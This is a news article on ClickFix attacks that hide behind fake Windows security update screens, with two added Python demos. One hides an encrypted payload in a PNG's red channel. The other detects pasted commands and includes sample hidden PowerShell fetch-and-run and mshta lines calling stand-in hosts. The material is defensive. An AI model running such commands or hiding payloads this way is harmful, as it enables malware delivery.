ClickFix attack employs fake Windows security updates.
Updated November 26 with a second threat intelligence report, this time from the Acronis Threat Research Unit, which also warns of fake Windows security update screens being used in ClickFix attacks, alongside the Huntress report covered below.
It is hard being a Windows user sometimes, given the constant flow of security alerts covering everything from attacks that abuse ancient protocols to brand new vulnerabilities. The good news is that Microsoft still issues security updates for all users, even those on the now unsupported Windows 10, if you know how to sign up for them. The bad news is that security updates can cause problems as well as solve them. The even worse news is that attackers have been using fake Windows security update screens as the lure in a ClickFix campaign. Here’s what you need to know.
Experts Sound Alert Over Fake Windows Security Updates
Security researchers at Huntress have confirmed that attackers using the ClickFix technique are now delivering it behind fake Windows security update screens.
ClickFix is a social engineering technique that tricks users into running malicious commands on their own machines, typically behind a fake error fix or an “I am not a robot” verification prompt. Such attacks have surged over the past year, with both state-sponsored espionage groups and cybercriminal gangs using the technique to deliver malware. Microsoft itself has already warned that ClickFix is the most commonly observed initial access method, “accounting for 47 percent of attacks” seen in Microsoft Defender notifications.
The November 24 report describes a new wave of ClickFix attacks, this time using extremely realistic and believable Windows Security Update screens to deploy credential-stealing malware. “A notable discovery during analysis was the campaign’s use of steganography to conceal the final malware stages within an image,” Huntress security analysts Ben Folland and Anna Pham said. “Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory.”
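To make the pixel-channel technique concrete, here is an added example written for this page (it is not Huntress’s code, nor the campaign’s loader or payload). It writes a structurally valid 8-bit RGB PNG whose red channel carries a length-prefixed, XOR-encrypted byte string, then parses the PNG back and reconstructs those bytes from that channel alone. The choice of the red channel, the XOR key and the demo payload are assumptions for illustration; the report quoted above does not say which channels or cipher the campaign uses. The point for defenders is that the carrier passes magic-byte checks, MIME sniffing and the usual “data appended after IEND” test, because nothing about the file is malformed.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Constructed demo payload and key: stand-ins, not the campaign's real stage or cipher.
DEMO_PAYLOAD = b"stage-2 loader bytes would go here"
XOR_KEY = b"\x5a\x13\xc7"


def _chunk(tag: bytes, data: bytes) -> bytes:
    """One PNG chunk: 4-byte length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def _xor(data: bytes) -> bytes:
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(data))


def encode_png(payload: bytes, width: int = 32) -> bytes:
    """Build a valid 8-bit RGB PNG whose red channel holds a 4-byte length prefix
    followed by the XOR-encrypted payload, one byte per pixel. Green and blue hold
    filler so the image is not obviously blank."""
    body = struct.pack(">I", len(payload)) + _xor(payload)
    height = -(-len(body) // width)                  # ceiling division
    body = body.ljust(width * height, b"\x00")
    raw = bytearray()
    for y in range(height):
        raw.append(0)                                # scanline filter type 0 (None)
        for x in range(width):
            raw += bytes((body[y * width + x], (x * 7) & 0xFF, (y * 13) & 0xFF))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 = RGB
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(bytes(raw))) + _chunk(b"IEND", b""))


def decode_png(png: bytes) -> bytes:
    """Walk the chunks, inflate IDAT, strip the per-scanline filter byte, read only
    the red channel and decrypt. Refuses anything but unfiltered 8-bit RGB, which is
    all this demo ever produces."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG")
    pos, width, height, idat = 8, 0, 0, b""
    while pos + 8 <= len(png):
        length = struct.unpack(">I", png[pos:pos + 4])[0]
        tag = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", data[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("demo only handles 8-bit RGB")
        elif tag == b"IDAT":
            idat += data
        elif tag == b"IEND":
            break
        pos += 12 + length                           # length + type + data + CRC
    raw = zlib.decompress(idat)
    stride = 1 + width * 3                           # filter byte + RGB per pixel
    reds = bytearray()
    for y in range(height):
        line = raw[y * stride:(y + 1) * stride]
        if line[0] != 0:
            raise ValueError("unsupported PNG filter type")
        reds += line[1::3]                           # red byte of every pixel
    n = struct.unpack(">I", reds[:4])[0]
    return _xor(bytes(reds[4:4 + n]))


def has_trailing_data(png: bytes) -> bool:
    """The crude check that catches 'append after IEND' stego but not this scheme."""
    end = png.rfind(b"IEND")
    return end != -1 and len(png) > end + 8           # IEND data is empty: type + CRC = 8 bytes


if __name__ == "__main__":
    img = encode_png(DEMO_PAYLOAD)
    print(len(img), "bytes; trailing data after IEND:", has_trailing_data(img))
    print(decode_png(img))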
Acronis Threat Research Unit Adds To Windows Security Update ClickFix Concerns
Security researchers at the Acronis Threat Research Unit have also confirmed what they are calling a “novel JackFix attack” that combines a realistic “full-screen Windows Update of Critical Windows Security Updates” with a number of screen hijacking techniques. The psychological tricks employed by the attackers are in plain view, with fake porn sites used to spring the ClickFix Windows Update trap. “The adult theme, and possible connection to shady websites,” Eliad Kimhy from the Acronis TRU said, “adds to the victim’s psychological pressure, making victims more likely to comply with sudden security update installation instructions.”
The campaign, Kimhy warned, obfuscates both the commands used to carry out the attack and the payload itself, and by doing so circumvents current ClickFix prevention and detection methods, making it all the more dangerous.
Windows User Recommendations To Mitigate The Latest ClickFix Attacks
All Windows users should be alert to the latest ClickFix attacks. Mitigation is simple and, as with every previous campaign, comes down to one rule: a genuine Windows security update, just like the fake CAPTCHA screens used before it, will never require you to copy a command from a web page and paste it into the Windows Run dialog, a PowerShell window or a terminal. It just doesn’t happen. Stay safe out there, and heed this advice.
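For defenders, the lure changes from campaign to campaign but the pasted command does not, so the most durable detection is on process-creation telemetry rather than on the fake update screen. As an added example for this page (not code from Huntress, Acronis or Microsoft), the logic below flags an interpreter launched by the interactive shell (explorer.exe is the parent of anything started from the Run dialog) whose command line carries the usual ClickFix markers: hidden window, encoded command, execution policy bypass, invoke-expression or a remote URL. The events are constructed in the shape of Sysmon Event ID 1 fields; the hosts, paths and command lines are invented for the demo.

```python
import re

# Constructed events shaped like Sysmon Event ID 1 (process creation) fields.
# Paths, hosts and command lines are invented for the demo, not captured telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://update.example.invalid/kb.png -UseBasicParsing)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File .\\build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

INTERACTIVE_SHELL = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}

# Markers that show up in pasted ClickFix one-liners; each hit yields a reason string.
MARKERS = [
    (re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+h", re.I), "hidden window"),
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I), "encoded command"),
    (re.compile(r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"https?://", re.I), "remote URL in command line"),
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event: dict) -> list[str]:
    """Reasons this event looks like a pasted ClickFix command; empty list means clean.
    Requires the interactive shell as parent AND a known interpreter AND at least one
    marker, so scripted or IDE-launched PowerShell does not fire on its own."""
    if _basename(event["ParentImage"]) != INTERACTIVE_SHELL:
        return []
    if _basename(event["Image"]) not in INTERPRETERS:
        return []
    cmd = event["CommandLine"]
    return [reason for pattern, reason in MARKERS if pattern.search(cmd)]


def flag_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, reasons) for every event that fires, in input order."""
    hits = []
    for i, ev in enumerate(events):
        reasons = clickfix_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine']!r} -> {', '.join(reasons)}")
```

The parent-process condition is what keeps this from being a generic “suspicious PowerShell” rule: an admin running a signed script from a scheduler or an IDE has a different parent. On the host itself, the Run dialog keeps its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a pasted one-liner also leaves a registry artifact worth pulling during triage. Campaigns like the one Acronis describes obfuscate the command, so treat the marker list as a starting point and expect to add patterns as the string-level tricks change.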
